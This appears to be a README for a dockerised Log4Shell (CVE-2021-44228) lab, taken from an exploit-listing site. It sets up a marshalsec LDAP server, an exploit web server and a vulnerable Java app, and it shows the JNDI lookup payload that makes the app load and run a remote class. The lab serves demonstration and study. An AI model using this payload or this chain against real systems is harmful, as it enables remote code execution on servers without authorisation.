## https://sploitus.com/exploit?id=F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80
# CVE-2021-44228_Example
## Run each of the 3 sections in a spearate tab/console
### marshalsec LDAP server https://github.com/chilliwebs/marshalsec (Forked from https://github.com/mbechler/marshalsec)
```
docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec
```
### The Exploit Web Server
```
docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit
```
### The Guinea Pig java app (running vulnerable versions of java and Log4J)
```
docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig
```
### When running the guinea_pig you should see the following logged:
```
PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}
```
### "PWND!" is logged from an externally injected class (Exploit)